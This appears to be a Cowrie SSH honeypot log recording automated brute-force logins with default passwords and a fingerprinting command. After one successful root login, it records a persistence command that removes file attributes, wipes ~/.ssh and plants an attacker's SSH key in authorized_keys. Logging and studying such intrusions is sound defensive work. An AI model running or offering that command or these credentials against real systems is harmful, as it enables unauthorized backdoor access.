{"eventid":"cowrie.session.closed","duration":"120.0","message":"Connection lost after 120.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:39:24.167582Z","src_ip":"212.227.125.160","session":"17249cdb7723"}
{"eventid":"cowrie.session.closed","duration":"120.0","message":"Connection lost after 120.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:39:24.168846Z","src_ip":"212.227.125.160","session":"76e08ed131d0"}
{"eventid":"cowrie.session.closed","duration":"120.0","message":"Connection lost after 120.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:39:24.169719Z","src_ip":"212.227.125.160","session":"ab38c0641b97"}
{"eventid":"cowrie.session.closed","duration":"120.0","message":"Connection lost after 120.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:39:24.170644Z","src_ip":"212.227.125.160","session":"8cf1c4e3e4fb"}
{"eventid":"cowrie.session.closed","duration":"120.0","message":"Connection lost after 120.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:39:24.171613Z","src_ip":"212.227.125.160","session":"f12212c664b6"}
{"eventid":"cowrie.session.closed","duration":"120.0","message":"Connection lost after 120.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:39:24.174418Z","src_ip":"212.227.125.160","session":"d68f644b4d4e"}
{"eventid":"cowrie.session.closed","duration":"120.0","message":"Connection lost after 120.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:39:24.175338Z","src_ip":"212.227.125.160","session":"e8f9cdcf1856"}
{"eventid":"cowrie.session.closed","duration":"120.0","message":"Connection lost after 120.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:39:24.176278Z","src_ip":"212.227.125.160","session":"310483fac28c"}
{"eventid":"cowrie.session.closed","duration":"120.0","message":"Connection lost after 120.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:39:24.177145Z","src_ip":"212.227.125.160","session":"803d90a55aa5"}
{"eventid":"cowrie.session.closed","duration":"120.0","message":"Connection lost after 120.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:39:24.177923Z","src_ip":"212.227.125.160","session":"d983b71feb61"}
{"eventid":"cowrie.session.closed","duration":"120.0","message":"Connection lost after 120.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:39:24.178783Z","src_ip":"212.227.125.160","session":"a6fd9b08c1cc"}
{"eventid":"cowrie.session.closed","duration":"120.0","message":"Connection lost after 120.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:39:24.179945Z","src_ip":"212.227.125.160","session":"68634ceb5d19"}
{"eventid":"cowrie.session.closed","duration":"120.0","message":"Connection lost after 120.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:39:24.180815Z","src_ip":"212.227.125.160","session":"e5bdcd9e579e"}
{"eventid":"cowrie.session.closed","duration":"120.0","message":"Connection lost after 120.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:39:24.182858Z","src_ip":"212.227.125.160","session":"f1d03587c2d8"}
{"eventid":"cowrie.login.success","username":"root","password":"passw0rd","message":"login attempt [root/passw0rd] succeeded","sensor":"my-vps","timestamp":"2025-08-28T06:39:24.188741Z","src_ip":"212.227.235.229","session":"400950ce8735"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T06:39:24.785333Z","src_ip":"212.227.235.229","session":"400950ce8735"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T06:39:24.786016Z","src_ip":"212.227.235.229","session":"400950ce8735"}
{"eventid":"cowrie.session.closed","duration":"120.0","message":"Connection lost after 120.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:39:24.950500Z","src_ip":"212.227.125.160","session":"6ed3d9d00f33"}
{"eventid":"cowrie.session.closed","duration":"120.0","message":"Connection lost after 120.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:39:24.951294Z","src_ip":"212.227.125.160","session":"137737c3aeee"}
{"eventid":"cowrie.session.closed","duration":"120.0","message":"Connection lost after 120.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:39:24.951802Z","src_ip":"212.227.125.160","session":"b296ca4badb3"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:39:25.044996Z","src_ip":"212.227.235.229","session":"400950ce8735"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:39:25.046057Z","src_ip":"212.227.235.229","session":"400950ce8735"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":38310,"dst_ip":"1.2.3.4","dst_port":22,"session":"70ed9e04e5d1","protocol":"ssh","message":"New connection: 212.227.125.160:38310 (1.2.3.4:22) [session: 70ed9e04e5d1]","sensor":"my-vps","timestamp":"2025-08-28T06:39:33.081319Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:39:33.082525Z","src_ip":"212.227.125.160","session":"70ed9e04e5d1"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:39:33.301000Z","src_ip":"212.227.125.160","session":"70ed9e04e5d1"}
{"eventid":"cowrie.session.connect","src_ip":"34.175.118.185","src_port":42572,"dst_ip":"1.2.3.4","dst_port":22,"session":"cabb72f05c11","protocol":"ssh","message":"New connection: 34.175.118.185:42572 (1.2.3.4:22) [session: cabb72f05c11]","sensor":"my-vps","timestamp":"2025-08-28T06:39:33.500732Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T06:39:33.501818Z","src_ip":"34.175.118.185","session":"cabb72f05c11"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T06:39:33.708569Z","src_ip":"34.175.118.185","session":"cabb72f05c11"}
{"eventid":"cowrie.login.failed","username":"rancher","password":"rancher","message":"login attempt [rancher/rancher] failed","sensor":"my-vps","timestamp":"2025-08-28T06:39:34.186436Z","src_ip":"212.227.125.160","session":"70ed9e04e5d1"}
{"eventid":"cowrie.login.success","username":"root","password":"123456b","message":"login attempt [root/123456b] succeeded","sensor":"my-vps","timestamp":"2025-08-28T06:39:34.243001Z","src_ip":"34.175.118.185","session":"cabb72f05c11"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T06:39:34.512955Z","src_ip":"34.175.118.185","session":"cabb72f05c11"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T06:39:34.513722Z","src_ip":"34.175.118.185","session":"cabb72f05c11"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T06:39:34.514494Z","src_ip":"34.175.118.185","session":"cabb72f05c11"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:39:34.707012Z","src_ip":"34.175.118.185","session":"cabb72f05c11"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T06:39:35.074785Z","src_ip":"34.175.118.185","session":"cabb72f05c11"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-28T06:39:35.075552Z","src_ip":"34.175.118.185","session":"cabb72f05c11"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-28T06:39:35.207877Z","src_ip":"34.175.118.185","session":"cabb72f05c11"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:39:35.209147Z","src_ip":"34.175.118.185","session":"cabb72f05c11"}
{"eventid":"cowrie.session.connect","src_ip":"34.175.118.185","src_port":43002,"dst_ip":"1.2.3.4","dst_port":22,"session":"0267ad39e399","protocol":"ssh","message":"New connection: 34.175.118.185:43002 (1.2.3.4:22) [session: 0267ad39e399]","sensor":"my-vps","timestamp":"2025-08-28T06:39:35.246089Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T06:39:35.247311Z","src_ip":"34.175.118.185","session":"0267ad39e399"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:39:35.407351Z","src_ip":"212.227.125.160","session":"70ed9e04e5d1"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T06:39:35.465694Z","src_ip":"34.175.118.185","session":"0267ad39e399"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-28T06:39:35.999556Z","src_ip":"34.175.118.185","session":"0267ad39e399"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:39:37.212697Z","src_ip":"34.175.118.185","session":"0267ad39e399"}
{"eventid":"cowrie.session.connect","src_ip":"34.175.118.185","src_port":43504,"dst_ip":"1.2.3.4","dst_port":22,"session":"6bb9f392bf88","protocol":"ssh","message":"New connection: 34.175.118.185:43504 (1.2.3.4:22) [session: 6bb9f392bf88]","sensor":"my-vps","timestamp":"2025-08-28T06:39:37.250973Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T06:39:37.251678Z","src_ip":"34.175.118.185","session":"6bb9f392bf88"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T06:39:37.465635Z","src_ip":"34.175.118.185","session":"6bb9f392bf88"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-28T06:39:37.998146Z","src_ip":"34.175.118.185","session":"6bb9f392bf88"}
{"eventid":"cowrie.session.closed","duration":"4.7","message":"Connection lost after 4.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:39:38.213207Z","src_ip":"34.175.118.185","session":"cabb72f05c11"}
{"eventid":"cowrie.session.closed","duration":"1.0","message":"Connection lost after 1.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:39:38.214293Z","src_ip":"34.175.118.185","session":"6bb9f392bf88"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38816,"dst_ip":"1.2.3.4","dst_port":22,"session":"63a639ededee","protocol":"ssh","message":"New connection: 212.227.235.229:38816 (1.2.3.4:22) [session: 63a639ededee]","sensor":"my-vps","timestamp":"2025-08-28T06:39:39.689627Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:39:39.690567Z","src_ip":"212.227.235.229","session":"63a639ededee"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:39:39.943924Z","src_ip":"212.227.235.229","session":"63a639ededee"}
{"eventid":"cowrie.login.failed","username":"rancher","password":"rancher","message":"login attempt [rancher/rancher] failed","sensor":"my-vps","timestamp":"2025-08-28T06:39:41.001417Z","src_ip":"212.227.235.229","session":"63a639ededee"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:39:42.257984Z","src_ip":"212.227.235.229","session":"63a639ededee"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":48216,"dst_ip":"1.2.3.4","dst_port":22,"session":"abd3f45eea1a","protocol":"ssh","message":"New connection: 212.227.125.160:48216 (1.2.3.4:22) [session: abd3f45eea1a]","sensor":"my-vps","timestamp":"2025-08-28T06:39:49.532161Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:39:49.540534Z","src_ip":"212.227.125.160","session":"abd3f45eea1a"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:39:49.751885Z","src_ip":"212.227.125.160","session":"abd3f45eea1a"}
{"eventid":"cowrie.login.failed","username":"es","password":"123456","message":"login attempt [es/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T06:39:50.630034Z","src_ip":"212.227.125.160","session":"abd3f45eea1a"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:39:51.851285Z","src_ip":"212.227.125.160","session":"abd3f45eea1a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34622,"dst_ip":"1.2.3.4","dst_port":22,"session":"47805dfac3d7","protocol":"ssh","message":"New connection: 212.227.235.229:34622 (1.2.3.4:22) [session: 47805dfac3d7]","sensor":"my-vps","timestamp":"2025-08-28T06:39:56.195157Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:39:56.196191Z","src_ip":"212.227.235.229","session":"47805dfac3d7"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:39:56.448843Z","src_ip":"212.227.235.229","session":"47805dfac3d7"}
{"eventid":"cowrie.login.failed","username":"es","password":"123456","message":"login attempt [es/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T06:39:57.208649Z","src_ip":"212.227.235.229","session":"47805dfac3d7"}
